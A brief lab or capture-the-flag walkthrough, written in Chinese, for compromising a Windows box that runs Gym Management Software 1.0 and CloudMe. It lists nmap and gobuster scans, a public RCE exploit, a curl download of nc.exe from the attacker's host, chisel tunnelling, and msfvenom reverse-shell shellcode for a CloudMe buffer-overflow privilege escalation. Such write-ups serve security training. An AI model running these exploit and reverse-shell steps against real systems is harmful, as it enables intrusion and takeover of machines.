nmap -sV -sC -Pn 10.129.25.107 > nmap.txt
nmap -p- 10.129.25.107 > nmapall.txt

gobuster dir  -u http://110.129.25.107:8080/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x txt,php  > gobuster.txt


1.nmap掃描出80端口,在contact頁面查看到服務版本
 Made using Gym Management Software 1.0
2.根據服務名及版本找到exploit腳本 48506.py
3.取得reverse shell後上傳nc.exe在做一次reverse穩定session(這裡nc64.exe不行,certutil也不行)
curl http://10.10.14.45/nc.exe -o nc.exe
4.在download下發現CloudMe_1112.exe
5.根據cloudMe找到BOF提權腳本
6.使用chisel將MySQL 3306 CloudMe 8888端口隧道回本地9002
.\chisel.exe client 10.10.14.45:9002 R:3306:localhost:3306 R:8888:localhost:8888
./chisel server --reverse --port 9002
7.登入Mysql查看有無帳密
mysql -u root -p -h 127.0.0.1
8.生成msfvenom reverse code
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.45 LPORT=6666 -b '\x00\x0A\x0D' -f python
9.更改48389.py內的code後執行取得root
python3 48389.py




